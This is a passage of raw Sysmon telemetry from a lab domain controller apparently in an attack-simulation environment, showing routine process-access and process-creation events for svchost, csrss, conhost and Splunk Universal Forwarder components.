10:40:16.494{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002241Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:16.329{733EE690-3E10-5F80-6700-000000007F01}3988C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002267Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:17.338{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E11-5F80-6800-000000007F01}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002266Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:17.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002265Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:17.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002264Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:17.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002263Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:17.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002262Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:17.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002261Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:17.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002260Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:17.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002259Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:17.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002258Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:17.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002257Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:17.338{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E11-5F80-6800-000000007F01}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002256Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:17.338{733EE690-3E09-5F80-3400-000000007F01}20324072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E11-5F80-6800-000000007F01}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002255Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:17.171{733EE690-3E11-5F80-6800-000000007F01}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002281Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:18.338{733EE690-3E12-5F80-6900-000000007F01}39803772C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002280Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:18.182{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E12-5F80-6900-000000007F01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002279Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:18.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002278Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:18.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002277Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:18.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002276Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:18.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002275Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:18.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002274Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:18.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002273Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:18.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002272Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:18.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002271Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:18.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002270Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:18.182{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E12-5F80-6900-000000007F01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002269Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 